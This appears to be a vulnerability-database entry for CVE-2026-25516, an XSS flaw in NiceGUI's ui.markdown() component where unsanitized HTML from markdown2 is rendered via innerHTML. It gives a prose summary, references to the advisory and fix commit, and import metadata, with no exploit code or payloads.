Search for vulnerabilities
| Vulnerability ID | VCID-2kbx-8xs3-p3gs |
| Aliases |
CVE-2026-25516
GHSA-v82v-c5x8-w282 |
| Summary | NiceGUI's XSS vulnerability in ui.markdown() allows arbitrary JavaScript execution through unsanitized HTML content The `ui.markdown()` component uses the `markdown2` library to convert markdown content to HTML, which is then rendered via `innerHTML`. By default, `markdown2` allows raw HTML to pass through unchanged. This means that if an application renders user-controlled content through `ui.markdown()`, an attacker can inject malicious HTML containing JavaScript event handlers. Unlike other NiceGUI components that render HTML (`ui.html()`, `ui.chat_message()`, `ui.interactive_image()`), the `ui.markdown()` component does not provide or require a `sanitize` parameter, leaving applications vulnerable to XSS attacks. |
| Status | Published |
| Exploitability | None |
| Weighted Severity | None |
| Risk | None |
| Affected and Fixed Packages | Package Details |
| System | Score | Found at |
|---|---|---|
| There are no known severity scores. | ||
| Reference id | Reference type | URL |
|---|---|---|
| https://github.com/zauberzeug/nicegui | ||
| https://github.com/zauberzeug/nicegui/commit/f1f7533577875af7d23f161ed3627f73584cb561 | ||
| CVE-2026-25516 | https://nvd.nist.gov/vuln/detail/CVE-2026-25516 | |
| GHSA-v82v-c5x8-w282 | https://github.com/advisories/GHSA-v82v-c5x8-w282 | |
| GHSA-v82v-c5x8-w282 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-v82v-c5x8-w282 |
No EPSS data available for this vulnerability.
| Date | Actor | Action | Source | VulnerableCode Version |
|---|---|---|---|---|
| 2026-06-02T04:49:58.191169+00:00 | GitLab Importer | Import | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/nicegui/CVE-2026-25516.yml | 38.6.0 |